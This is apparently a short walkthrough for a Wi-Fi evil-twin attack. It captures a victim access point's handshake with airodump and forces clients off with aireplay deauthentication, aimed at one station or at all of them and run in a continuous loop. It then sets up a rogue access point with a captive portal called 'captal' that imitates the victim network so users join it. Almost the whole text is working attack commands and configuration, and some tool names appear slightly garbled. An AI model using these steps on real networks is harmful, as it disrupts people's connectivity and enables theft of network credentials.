sudo airodump -M wlan0
Save bssid and channel of the victim-AP.
sudo airodump -M --bssid $BSSID --channel $CHANNEL -w output wlan0
a) Deauthenticate specific station:
sudo aireplay -0 5 -a $BSSID -c $STATION
b) Deauthenticate all stations:
sudo aireplay -0 5 -a $BSSID
Since the output-01.cap
has the handshake, we can configure the
captal now!
The following configuration assumes that the captal have been
installed with PREFIX=/usr
instead of default PREFIX=/usr/local
.
CAP_FILE=/path/to/your/output-*.cap
SSID=your_victim_ssid
interface=your_roqueAP_interface
ssid=your_victimAP_ssid
channel=your_victimAP_channel
Uncomment one of the server.document-root
variable.
sudo /etc/rc.d/captal start
sudo tail -f /var/log/messages /var/log/lighttpd.log
They need to join us.
a) Deauthenticate specific station:
sudo aireplay -0 0 -a $BSSID -c $STATION
b) Deauthenticate all stations:
sudo aireplay -0 0 -a $BSSID